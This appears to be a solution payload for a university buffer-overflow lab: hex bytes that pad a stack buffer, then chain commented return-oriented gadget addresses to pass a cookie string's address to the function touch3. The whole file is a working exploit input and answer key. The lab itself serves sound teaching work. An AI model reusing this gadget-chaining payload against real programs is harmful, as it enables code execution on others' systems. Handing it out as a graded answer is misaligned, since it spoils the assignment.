00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 /* Jump to 0x401a06, the code is #movq %rsp, %rax; #ret */
c5 19 40 00 00 00 00 00 /* Jump to 0x4019c5, the code is #movq %rax, %rdi; #nop; #ret */
ab 19 40 00 00 00 00 00 /* Jump to 0x4019ab, the code is #popq %rax; #nop; #ret */
48 00 00 00 00 00 00 00 /* The offset of cookie string in buffer */
dd 19 40 00 00 00 00 00 /* Jump to 0x4019dd, the code is #movl %eax, %edx; #nop; #ret */
34 1a 40 00 00 00 00 00 /* Jump to 0x401a34, the code is #movl %edx, %ecx; #cmpb %cl, %cl; #ret */
13 1a 40 00 00 00 00 00 /* Jump to 0x401a13, the code is #movl %ecx, %esi; #nop; #nop; #ret */
d6 19 40 00 00 00 00 00 /* Jump to 0x4019d6, the code is #leaq (%rdi,%rsi,1), %rax; #ret */
c5 19 40 00 00 00 00 00 /* Jump to 0x4019c5, the code is #movq %rax, %rdi; #nop; #ret */
fa 18 40 00 00 00 00 00 /* Jump to 0x4018fa, address of function touch3 */
35 39 62 39 39 37 66 61 /* Cookie (as a string) */

